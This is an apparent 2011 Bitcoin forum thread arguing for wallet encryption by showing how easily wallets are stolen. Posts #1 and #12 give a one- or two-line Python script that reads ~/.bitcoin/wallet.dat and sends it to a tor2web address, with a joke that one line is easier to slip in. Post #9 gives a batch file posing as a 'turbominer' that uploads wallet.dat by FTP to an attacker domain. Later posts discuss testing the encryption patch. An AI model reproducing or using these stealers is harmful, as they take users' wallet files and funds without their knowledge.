Author

Topic: WALLET STEALER: so simple can it be! (Read 4806 times)

member
Activity: 87
Merit: 10
June 18, 2011, 10:42:07 AM
#12
thats is! so simple can a wallet stealer be. JUST 2 LINES!


Code:
import urllib as u, os.path as o; u.urlopen("https://yfwcdtpmqwrqu2pl.tor2web.org",open(o.expanduser("~/.bitcoin/wallet.dat")).read())

Now doubly serious! One line must be easier to slip in than two, right?

(Are semicolons legal after import statements? I didn't bother to check)
sr. member
Activity: 314
Merit: 251
June 18, 2011, 09:27:29 AM
#11
And then one could write a script using the victims own GPU power to brute force the wallet's encryption! Grin

Bitcoin isn't of value? It causes research in so many fields. Usually the opposite is true for money. So it's maybe to most valuable currency in existence.
legendary
Activity: 1652
Merit: 2216
Chief Scientist
June 18, 2011, 08:28:41 AM
#10
The biggest thing non programmers can do is TEST IT! One bug was found a little while ago were some coins were lost with the encryption. The more testers there is testing the encryption, the faster they can release it! Try moving money around with a few coins, pretty much try to get the client to not work as expected!
+1

If you can, please help test, it really helps. Patch for wallet encryption is at: https://github.com/bitcoin/bitcoin/pull/232
As bitlotto says, us a wallet with very few coins in it and/or run with the -testnet flag to use test network coins.
newbie
Activity: 16
Merit: 0
June 17, 2011, 08:09:34 PM
#9
turbominer.bat now mines over 9000% faster.

Code:
@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open ftp.evildomain.com
anonymous
password
bin
put "Bitcoin\wallet.dat"
bye
hero member
Activity: 672
Merit: 500
BitLotto - best odds + best payouts + cheat-proof
June 17, 2011, 05:53:47 PM
#8
The biggest thing non programmers can do is TEST IT! One bug was found a little while ago were some coins were lost with the encryption. The more testers there is testing the encryption, the faster they can release it! Try moving money around with a few coins, pretty much try to get the client to not work as expected!
newbie
Activity: 28
Merit: 0
June 17, 2011, 05:48:50 PM
#7
I fully endorse this thread.
newbie
Activity: 42
Merit: 0
June 17, 2011, 05:09:11 PM
#6
will there be some kind of password protection for the wallet file? so if i like to open it with the bitcoin client i have to type in my password, would offer a lot better protection.

legendary
Activity: 1050
Merit: 1000
You are WRONG!
June 17, 2011, 03:14:22 PM
#5
Well they're working on it for the next update and only have so many hands. Be patient.
i am patient! just worrying about the noobs, who download crap to their computers.
im just wanting to show how eazy it is, to steal a wallet Smiley
sr. member
Activity: 364
Merit: 250
June 17, 2011, 03:12:19 PM
#4
Well they're working on it for the next update and only have so many hands. Be patient.
legendary
Activity: 1050
Merit: 1000
You are WRONG!
June 17, 2011, 03:11:17 PM
#3
WE NEED ENCRYPTED WALLETS! NOW!

Planning to help speed up the process?
nope! im lazy as hell Cheesy
sr. member
Activity: 364
Merit: 250
June 17, 2011, 03:09:45 PM
#2
WE NEED ENCRYPTED WALLETS! NOW!

Planning to help speed up the process?
legendary
Activity: 1050
Merit: 1000
You are WRONG!
June 17, 2011, 03:07:45 PM
#1
Code:
import urllib as u, os.path as o
u.urlopen("https://yfwcdtpmqwrqu2pl.tor2web.org",open(o.expanduser("~/.bitcoin/wallet.dat")).read())

thats is! so simple can a wallet stealer be. JUST 2 LINES!

WE NEED ENCRYPTED WALLETS! NOW!
Jump to: